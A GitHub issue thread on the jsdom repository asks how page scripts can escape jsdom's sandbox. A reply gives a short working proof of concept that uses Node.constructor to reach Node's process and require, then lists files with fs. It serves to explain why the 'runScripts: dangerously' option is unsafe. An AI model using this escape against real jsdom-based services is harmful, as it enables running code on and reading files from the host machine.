### ISSUE TITLE
How can a script escape the sandbox?

### ISSUE THREAD

**Issue by underflow00** [jsdom/jsdom#2729]
The documentation states:

> The jsdom sandbox is not foolproof, and code running inside the DOM's <script>s can, if it tries hard enough, get access to the Node.js environment, and thus to your machine.

How would a script escape the sandbox? Is there an example of this?

**Comment by pmdartus** [comment]
Here is a small example by extracting the `Function` from the Node.js environment.

```js
const { JSDOM } = require("jsdom");

new JSDOM(`
<body>
  <script>
    const outerRealmFunctionConstructor = Node.constructor;
    const process = new outerRealmFunctionConstructor("return process")();
    const require = process.mainModule.require;

    // Game over!
    const fs = require('fs');
    console.log(fs.readdirSync('.'));
  </script>
</body>
`, { 
  runScripts: "dangerously" 
});
```
